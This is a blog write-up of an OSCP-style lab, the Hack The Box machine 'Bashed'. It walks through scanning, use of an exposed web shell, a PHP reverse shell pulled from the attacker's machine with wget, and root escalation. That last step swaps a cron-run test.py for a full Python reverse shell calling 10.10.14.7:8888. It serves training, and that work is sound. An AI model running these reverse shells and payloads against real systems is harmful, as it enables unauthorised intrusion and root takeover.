Open in app

Sign in

Write

Sign in

Another OSCP-like Box: Bashed

@ro0taddict
6 min readApr 2, 2021

This is my fifth writeup for this series.

Enumeration

As usual, I started my enumeration with Nmap.

sudo nmap -sC -sV 10.10.10.68 -oA default-scan

I only saw TCP port 80 on this box. I then ran Masscan to confirm all open TCP ports.

sudo masscan -p1–65535 -i tun0 10.10.10.68

Since HTTP was running on the host, I then used Gobuster to check for any exposed folders.

sudo apt gobuster

sudo gobuster dir -u 10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

I browsed the exposed folders and saw some interesting files in /dev directory.

The phpbash.php was some type of a webshell.

Exploitation

I ran “id” to check my privilege of this web shell.

Since the box runs PHP script, I then used a PHP reverse shell script from Pentestmonkey.

locate php-reverse-shell

cp /usr/share/laudanum/php/php-reverse-shell.php .

I then changed the IP in the script to the IP of my Kali.

nano php-reverse-shell.php

I saved the edited script and run SimpleHTTPServer to host the file.

sudo python -m SimpleHTTPServer 80

In the webshell, I transferred the php-reverse-shell script to Bashed using wget. The default directory, /var/www/html/dev is not writable. I changed my directory to /dev/shm.

cd /dev/shm

wget http://10.10.14.7/php-reverse-shell.php

Listener

I then set up a Netcat listener on port 8888 in another terminal.

I executed the script to get a reverse shell access.

php php-reverse-shell.php

I upgraded my access to an interactive shell by following this link.

whoami&&id&&hostname

Post Exploitation

Next, I continued with escalating my privilege to root access. I used a tool called Linux Smart Enumeration from Github.

wget https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh

I transferred Linux Smart Enumeration to /dev/shm in Bashed.

wget http://10.10.14.7/lse.sh

I then executed the script using the command below.

bash lse.sh -i

I noticed that Scriptmanager user can run Sudo with no password. I immediately switched my access to Scriptmanager.

sudo -i -u scriptmanager

I ran Linux Smart Enumeration again, however I didn't get any results that is useful in privilege escalation. I then downloaded a tool call Pspy. This is useful in checking for any running Cron jobs . The tool can be downloaded from this Github link.

I transferred the Pspy script to Bashed using Wget.

wget http://10.10.14.7/pspy64s

I then enabled the execute permission of the file and ran it.

chmod +x pspy64s

While running Pspy, I noticed that test.py was running every minute and it was executed by root(uid=0).

I then searched for that test.py file. I went to “/” directory and ran the command below . These command looked for directories and files that were writable by Scriptmanager.

find / -maxdepth 1 -writable -type ffind / -maxdepth 1 -writable -type d

I checked the /scripts directory and found the test.py script. This script was owned by Scriptmanager so I can changed it if need be.

Looking at test.py, this script opens test.txt and writes something to it.

I also noticed that test.txt that was created by test.py script was owned by root. If I can spawn a shell using test.py script, that shell will have root access. I tried to edit test.py in Bashed but I wasn't successful.

In another Kali terminal, I created a file named test.py using Nano.

nano test.py

I added the script below, I made sure to put the IP Address of my Kali.

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((“10.10.14.7”,8888))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);

In the Bashed terminal running as Scriptmanager, I changed the name of test.py to test.bak

I then transferred the test.py from Kali to Bashed while I had a Netcat listener running on port 8888.

wget http://10.10.14.7/test.py

After a minute, I got a root shell access in the new Netcat listener.

Flags

Key Takeaways

  • Always limit access to files and folders that are very important to the systems or networks
  • Avoid having a web shell access on a server, If there is a need for one, make sure to implement compensating security controls
  • In this writeup, we used Nmap for enumeration together with Masscan.
  • For directory bruteforcing, we can use tools such as Gobuster, Drib, Dirsearch, etc,
  • In privilege escalation, we can use automated script such as Linux Smart Enumeration and Pspy to look for possible attack surface.

--

--

@ro0taddict

Written by @ro0taddict

16 Followers

InfoSec enthusiast; Lifelong learner

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams